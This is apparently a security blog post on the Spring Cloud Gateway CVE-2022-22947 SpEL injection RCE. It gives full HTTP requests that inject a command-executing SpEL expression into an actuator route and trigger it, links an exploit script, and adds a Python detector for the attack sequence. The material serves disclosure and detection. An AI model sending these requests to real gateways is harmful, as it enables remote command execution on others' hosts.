Spring Cloud Gateway RCE CVE-2022-22947

Vulnerability Info · Cyber Security · 2023-09-08 · 755 views

Principle

When the Gateway Actuator endpoint is enabled and exposed, a malicious SpEL expression can be embedded in a route, and refreshing the routes causes it to be evaluated, leading to RCE.

Reference article:
https://blog.csdn.net/m0_61506558/article/details/126914956

Affected versions

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.1.7
Spring Cloud Gateway 2.x

Impact

A remote attacker can exploit this vulnerability by sending malicious requests, allowing arbitrary commands to be executed on the remote host.

POC & EXP

Manual

# 1. Request http://x.x.x.x:x/actuator to confirm the actuator endpoint is open

# 2. Create a new route and inject the malicious SpEL expression; the response status should be 201 Created
POST /actuator/gateway/routes/test HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type:application/json
Content-Length: 298

{"id": "test","filters": [{"name": "AddResponseHeader","args": {"value":"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}","name": "cmd"}}],"uri": "http://example.com:80","order": 0 }

# 3. Refresh the route table
POST /actuator/gateway/refresh HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

a=1

# 4. Access the route just created: http://x.x.x.x:x/actuator/gateway/routes/test
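The four steps above form a recognisable sequence on the wire: a write to /actuator/gateway/routes/<id> whose body carries SpEL markers, then a POST to /actuator/gateway/refresh from the same source, then a read of the new route. The following is an added detection example, not code from the original post or from the linked script: it runs that logic over a request log that records bodies (as a WAF or reverse proxy might). The log format, the field names (ts, src, method, path, body), the sample records, the five-minute correlation window and the rule names are all constructed assumptions.

```python
"""Detection of the CVE-2022-22947 exploitation sequence in a request log.

Added example (not from the original post). Assumes a JSON-lines request log
with the fields ts, src, method, path and body; all records are constructed.
"""
import json
import re
from datetime import datetime, timedelta

# Constructed sample records, not real traffic. The first source performs the
# route write / refresh / read sequence with a harmless SpEL probe; the second
# is an operator creating an ordinary route through the same actuator endpoint.
RECORDS = [
    {"ts": "2023-09-08T10:00:01Z", "src": "203.0.113.5", "method": "GET",
     "path": "/actuator", "body": ""},
    {"ts": "2023-09-08T10:00:02Z", "src": "203.0.113.5", "method": "POST",
     "path": "/actuator/gateway/routes/test",
     "body": json.dumps({"id": "test", "filters": [{"name": "AddResponseHeader",
              "args": {"value": "#{new java.lang.String('probe')}", "name": "cmd"}}],
              "uri": "http://example.com:80", "order": 0})},
    {"ts": "2023-09-08T10:00:03Z", "src": "203.0.113.5", "method": "POST",
     "path": "/actuator/gateway/refresh", "body": "a=1"},
    {"ts": "2023-09-08T10:00:04Z", "src": "203.0.113.5", "method": "GET",
     "path": "/actuator/gateway/routes/test", "body": ""},
    {"ts": "2023-09-08T10:05:00Z", "src": "198.51.100.7", "method": "POST",
     "path": "/actuator/gateway/routes/orders",
     "body": json.dumps({"id": "orders", "uri": "lb://orders",
                         "predicates": ["Path=/orders/**"]})},
    {"ts": "2023-09-08T10:05:01Z", "src": "198.51.100.7", "method": "POST",
     "path": "/actuator/gateway/refresh", "body": ""},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in RECORDS) + "\n"

# "#{" is the SpEL placeholder the gateway evaluates; "T(" is the SpEL type
# reference used to reach static methods. "T(" alone is a coarse marker, so it
# is only applied to bodies of route writes, not to arbitrary traffic.
SPEL_MARKERS = re.compile(r"#\{|T\(")
ROUTE_WRITE = re.compile(r"^/actuator/gateway/routes/[^/]+/?$")
REFRESH_PATH = "/actuator/gateway/refresh"
WRITE_METHODS = {"POST", "PUT", "DELETE"}


def parse_log(text):
    """Parse JSON-lines records and convert the timestamp to datetime."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        records.append(rec)
    return records


def detect(text, window=timedelta(minutes=5)):
    """Return findings for actuator route writes and correlated refreshes.

    - spel_in_route_definition: a route write whose body carries SpEL markers
    - refresh_after_spel_route_write: a refresh from the same source within
      `window` of such a write (the point at which the expression is evaluated)
    - actuator_route_write: any other route change via the actuator, which is
      worth auditing even when benign
    """
    findings = []
    tainted = {}  # src -> timestamp of the last SpEL-bearing route write
    for rec in sorted(parse_log(text), key=lambda r: r["ts"]):
        path, method, src = rec["path"], rec["method"], rec["src"]
        base = {"src": src, "ts": rec["ts"].isoformat(), "path": path}
        if method in WRITE_METHODS and ROUTE_WRITE.match(path):
            if SPEL_MARKERS.search(rec.get("body", "")):
                tainted[src] = rec["ts"]
                findings.append(dict(base, severity="high",
                                     rule="spel_in_route_definition"))
            else:
                findings.append(dict(base, severity="info",
                                     rule="actuator_route_write"))
        elif method == "POST" and path == REFRESH_PATH:
            last = tainted.get(src)
            if last is not None and rec["ts"] - last <= window:
                findings.append(dict(base, severity="critical",
                                     rule="refresh_after_spel_route_write"))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(json.dumps(finding))
```

The refresh correlation is what separates a probe from an actual trigger: the expression in the route definition is only evaluated once the route table is reloaded, so the critical finding fires on the refresh, not on the write. Any write to the gateway actuator routes endpoint from outside the operations network is itself worth alerting on, since exposure of that endpoint is the precondition the Principle section names.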

Script

https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947

Tags: RCE, middleware, remote code execution, Java, 2022